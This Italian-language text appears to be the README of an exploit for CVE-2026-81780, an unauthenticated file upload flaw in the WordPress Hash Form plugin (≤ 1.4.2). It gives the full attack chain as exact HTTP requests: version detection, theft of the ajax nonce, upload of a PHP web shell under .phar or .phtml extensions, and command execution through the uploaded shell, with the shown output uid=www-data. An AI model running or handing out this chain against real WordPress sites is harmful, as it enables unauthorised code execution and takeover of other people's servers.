
Exploit per CVE-2026-81780: upload di file non autenticato nel plugin WordPress Hash Form che porta all'esecuzione remota di codice tramite payload PHP appositamente predisposti.
CVE-2026-81780 — Hash Form RCE
La vulnerabilità
Upload di file non autenticato nel plugin WordPress Hash Form (≤ 1.4.2). Il plugin consente upload di file arbitrari senza una corretta autenticazione o validazione del tipo di file, portando a Remote Code Execution (RCE).
Catena di sfruttamento
Passaggio Azione 1 L'attaccante verifica la presenza del plugin Hash Form tramite readme.txt 2 Estrae ajax_nounce visualizzando in anteprima i moduli (hashform_preview) 3 Invia una richiesta POST a hashform_file_upload_action con il payload PHP 4 Carica una web shell come .phar, .phtml, .php5 o .php7 5 Attiva la shell accedendo a /wp-content/uploads/hashform/temp/v.{ext} 6 Esegue comandi di sistema tramite ?c=id
GET /wp-content/plugins/hash-form/readme.txt
↓
Version Detected (≤ 1.4.2)
↓
GET /wp-admin/admin-ajax.php?action=hashform_preview&form=1
↓
Extract Nonce: ajax_nounce=...
↓
POST /wp-admin/admin-ajax.php?action=hashform_file_upload_action
↓
Upload: v.phar (or .phtml, .php5, .php7)
↓
GET /wp-content/uploads/hashform/temp/v.phar?c=id
↓
Command Executed (uid=www-data)```